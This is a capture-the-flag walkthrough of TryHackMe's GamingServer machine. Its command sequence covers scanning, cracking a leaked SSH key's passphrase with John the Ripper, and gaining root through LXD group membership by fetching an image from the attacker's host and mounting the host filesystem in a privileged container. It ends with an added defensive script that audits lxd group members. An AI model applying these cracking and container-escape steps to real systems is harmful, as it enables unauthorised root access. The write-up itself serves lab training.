Try Hack Me | GamingServer

DebianHat
Sep 1, 2020
  1. Introduction
  2. Scanning and Enumeration
  3. Exploiting
  4. Capture User flag and Privilege Escalation

Introduction

What if a normal user could be escalated to root without sudo rights, and without even entering a password? That is the new thing the GamingServer machine has to teach, and what makes it different from past machines.

If you are not familiar with the LXC and LXD container virtualization technologies, have a look at them before you start solving this box.
Link: https://www.hackingarticles.in/lxd-privilege-escalation/

The initial foothold is easy to find: it requires a bit of enumeration and scanning, just like other CTF-style boxes, and then you have an initial user shell.

Scanning and Enumeration

Scanning starts as usual with an Nmap scan, which gives us 2 open ports:
port 22 (ssh) and port 80 (http)

$ nmap -v -sV -sC <ip_addr>

Here we get ports 80 and 22, which almost certainly means we will get SSH credentials one way or another by enumerating the web host.

Let's snoop around the web host, but before that, start DirBuster so that we can find any hidden directories.

Looking around the web page, I couldn't find anything interesting other than the robots.txt page and what looks like a username in the source code of the web page.

Here we got a directory, uploads, and a username, john. Let's head to the directory and see whether it contains something interesting.

dict.lst seems to be a password list. Save it and keep it aside for a while, then check what we got from the DirBuster results.

$ wget http://<machine-ip>/uploads/dict.lst

DirBuster gave us the secret directory, which contains something secret, i.e. the private SSH key.

Let's save the file as id_rsa and try to brute-force its passphrase using John the Ripper, with the dict.lst we found earlier as the wordlist.

$ python3 /usr/share/john/ssh2john.py id_rsa > rsa.hash

$ john --wordlist=dict.lst rsa.hash

Voilà, we successfully cracked the hash and got a passphrase. Let's try to log in using john as the username, with the passphrase we cracked above.

$ chmod 600 id_rsa
$ ssh -i id_rsa john@<machine-ip>

Woohoo! There we go, we got the user flag.

Let's move on and try to escalate privileges to get root access.

Privilege Escalation

Have a look above: we found that john is in the lxd group, so this is where LXD exploitation comes in.

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine

Above, we generated an image file. Now let's get onto the target machine and download the image file there.

$ python -m SimpleHTTPServer

$ wget http://<ip-add>/imagefilename.tar.gz

$ lxc image import ./imagefilename.tar.gz --alias myimage
$ lxc image list

$ lxc init myimage ignite -c security.privileged=true
$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start ignite
$ lxc exec ignite /bin/sh

Boom, we are root now!

Grab the root flag in /mnt/root/root.
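
The escalation above depends on a single fact: john belongs to the lxd group, and access to the LXD daemon is equivalent to root on the host. As an added example (not part of the original write-up), this audit lists every non-root account with that membership, including primary-GID members that a plain look at the group file misses; the function name `lxd_members` and the sample accounts are constructed for illustration.

```shell
#!/bin/sh
# Added example: list non-root accounts in the lxd group, whether they are
# supplementary members (group file) or have it as primary GID (passwd file).

# lxd_members GROUP_FILE PASSWD_FILE [GROUP_NAME]
# Prints one account name per line, sorted and de-duplicated.
lxd_members() {
    group_file=$1
    passwd_file=$2
    group_name=${3:-lxd}

    awk -F: -v grp="$group_name" '
        # First file (group database): remember the GID of the target group
        # and print its comma-separated supplementary members.
        FNR == NR {
            if ($1 == grp) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
            }
            next
        }
        # Second file (passwd database): accounts whose primary GID is the
        # target group never appear in the member list above.
        gid != "" && $4 == gid { print $1 }
    ' "$group_file" "$passwd_file" | grep -vx root | sort -u
}

# Constructed sample data: john is a supplementary member (as on this box),
# svc-build is a hypothetical account with lxd as its primary group.
demo() {
    tmp=$(mktemp -d)
    cat > "$tmp/group" <<'EOF'
root:x:0:
sudo:x:27:
lxd:x:108:john,root
EOF
    cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
svc-build:x:1001:108::/home/svc-build:/bin/sh
EOF
    lxd_members "$tmp/group" "$tmp/passwd"
    rm -rf "$tmp"
}

demo
```

On a real host, call `lxd_members /etc/group /etc/passwd` and treat every account it prints as root-equivalent; `gpasswd -d <user> lxd` removes a membership that is not needed. Accounts that come from LDAP or SSSD are not in those files, so save the output of `getent group` and `getent passwd` to files and pass those instead.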

Conclusion

I hope it was enjoyable and helpful for you.
Thanks for your time.

DebianHat

Penetration Tester, Ethical Hacker, Security Analyst